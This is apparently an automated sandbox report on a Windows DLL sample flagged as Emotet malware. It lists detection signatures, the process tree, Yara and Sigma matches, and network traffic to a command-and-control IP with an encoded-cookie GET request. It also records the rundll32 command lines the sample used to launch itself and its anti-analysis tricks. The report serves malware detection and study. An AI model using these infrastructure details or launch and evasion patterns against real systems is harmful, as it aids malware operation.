
Windows Analysis Report IGidwJjoUs

Overview

General Information

Sample Name: IGidwJjoUs (renamed file extension from none to dll)
Analysis ID: 532314
MD5: daf0060326338fd3d153248ca89b40e5
SHA1: b11244a64678d1e8280b7daf273cb0563ee51803
SHA256: e9f7e82f30ad5350adb0ad37ac11bc26ae7f3b0879fe33e2a23c97f158c85780
Tags: 32, dll, exe

Detection

Emotet
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
AV process strings found (often used to terminate AV products)
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6888 cmdline: loaddll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6908 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6932 cmdline: rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 5624 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6920 cmdline: rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 6496 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd",czAZWAgsaZPj MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6128 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cwisdx\vimpwfmepmyc.nyd",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6988 cmdline: rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,ajkaibu MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5228 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7000 cmdline: rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,akyncbgollmj MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 6572 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 7052 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 308 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 3144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 304 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5996 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6596 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6888 -ip 6888 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6948 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6888 -ip 6888 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5528 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6240 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5644 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4588 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000003.00000002.913568790.0000000001020000.00000040.00000010.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000003.00000002.913568790.0000000001020000.00000040.00000010.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000000.00000000.939956990.0000000001170000.00000040.00000010.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000000.00000000.939956990.0000000001170000.00000040.00000010.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000006.00000002.930364249.00000000003B0000.00000040.00000010.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(5 of 30 entries shown)

Unpacked PEs

Source | Rule | Description | Author
12.2.rundll32.exe.10b0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
12.2.rundll32.exe.10b0000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
3.2.rundll32.exe.1020000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
3.2.rundll32.exe.1020000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0.0.loaddll32.exe.1170000.9.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(5 of 75 entries shown)

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation
Source: Process started | Author: FPT.EagleEye | Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cwisdx\vimpwfmepmyc.nyd",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cwisdx\vimpwfmepmyc.nyd",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd",czAZWAgsaZPj, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6496, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cwisdx\vimpwfmepmyc.nyd",Control_RunDLL, ProcessId: 6128

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: IGidwJjoUs.dll | Virustotal: Detection: 18%
Source: IGidwJjoUs.dll | ReversingLabs: Detection: 17%
Source: IGidwJjoUs.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
Source: unknown | HTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: IGidwJjoUs.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E7C0927 FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6E7C0927 FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_00ECE2C8 FindFirstFileW,

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 45.63.5.129 187
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic | HTTP traffic detected: GET /vIcMmPpXrabVVBXOJgaOKuPeOcCKPXUIh HTTP/1.1 Cookie: HR=hcy/hRyH9NLoEyk6a7Uz59hOb7mzlO/wmgmuw+U+8hB3e4M76BBMZiQXdzL+rOvzb1yL3LfyOSim45PynOuCpUIZnQ5cZmHqs7SQt9O7zwz4xkXcg6/oRkU7EE5sPE10xFi1y7VDx9Ov7ygmxpemyuKnLT/gv0JB9m9mcmPDhKiVbEhBpBiGTYaZoGTSg6tFd1fI6MMeVezZeVD7pkX8i8U0SqwAVpQnS4Y1xB1iegh6pXp4tFE7gJs9t6T5v6aI71n7DxNMxlhyB7kHYd2tzisWwB/rDwKlrXgJBvRGWdLzEoTJug== Host: 45.63.5.129 Connection: Keep-Alive Cache-Control: no-cache
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown | Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 45.63.5.129
Source: WerFault.exe, 00000014.00000002.988862312.0000000004911000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.986850979.0000000004911000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.1175308900.0000015108B0D000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1160420267.0000015108B0C000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000001F.00000002.1175003928.00000151084EB000.00000004.00000001.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmp | String found in binary or memory: http://help.disneyplus.com.
Source: Amcache.hve.17.dr | String found in binary or memory: http://upx.sf.net
Source: svchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmp | String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000001F.00000003.1153314663.0000015108B7E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1153380650.0000015109002000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1153337846.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1153407395.0000015108B7E000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_00EB3394 InternetReadFile,

E-Banking Fraud:

Yara detected Emotet
                      Source: Yara matchFile source: 00000000.00000000.956837036.0000000001170000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.939031365.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.1183917294.0000000000EB0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.956978658.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.938967752.0000000001170000.00000040.00000010.sdmp, type: MEMORY

                      System Summary:

Source: IGidwJjoUs.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6888 -ip 6888
Source: C:\Windows\SysWOW64\rundll32.exe | File deleted: C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd:Zone.Identifier
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Cwisdx\
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010D20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010D1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ED20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ED1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBCF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ED0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB40E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ED1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBCE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ED261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBBD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBCB13
                      Source: C:\Windows\System32\loaddll32.exe  Code function: String function: 6E7BAC90 appears 33 times
                      Source: C:\Windows\System32\loaddll32.exe  Code function: String function: 6E7A1DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exe  Code function: String function: 6E7BAC90 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exe  Code function: String function: 6E7A1DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exe  Process Stats: CPU usage > 98%
                      Source: IGidwJjoUs.dll  Virustotal: Detection: 18%
                      Source: IGidwJjoUs.dll  ReversingLabs: Detection: 17%
                      Source: IGidwJjoUs.dll  Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown  Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll"
                      Source: C:\Windows\System32\loaddll32.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe  Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe  Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exe  Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,akyncbgollmj
                      Source: C:\Windows\SysWOW64\rundll32.exe  Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe  Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd",czAZWAgsaZPj
                      Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exe  Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6888 -ip 6888
                      Source: C:\Windows\System32\loaddll32.exe  Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 308
                      Source: C:\Windows\System32\svchost.exe  Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6888 -ip 6888
                      Source: C:\Windows\System32\loaddll32.exe  Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 304
                      Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\rundll32.exe  Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cwisdx\vimpwfmepmyc.nyd",Control_RunDLL
                      Source: C:\Windows\System32\svchost.exe  Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 308
                      Source: C:\Windows\System32\svchost.exe  Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 304
                      Source: C:\Windows\SysWOW64\WerFault.exe  Process created: unknown unknown
                      Source: C:\Windows\SysWOW64\rundll32.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: C:\Windows\System32\svchost.exe  File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER42EA.tmp
                      Source: classification engine  Classification label: mal84.troj.evad.winDLL@36/14@0/2
                      Source: C:\Windows\SysWOW64\rundll32.exe  File read: C:\Users\desktop.ini
                      Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 23_2_00ED1B99 CreateToolhelp32Snapshot,
                      Source: C:\Windows\SysWOW64\WerFault.exe  Mutant created: \BaseNamedObjects\Local\SM0:6596:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exe  Mutant created: \BaseNamedObjects\Local\SM0:6948:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6888
                      Source: C:\Windows\SysWOW64\WerFault.exe  File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exe  File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe  Automated click: OK
                      Source: IGidwJjoUs.dll  Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: IGidwJjoUs.dll  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: aUojrXoCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000011.00000002.954537444.0000000000492000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944571126.0000000000891000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944524592.0000000000DEA000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944726193.0000000000891000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944963869.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944733553.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944575719.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
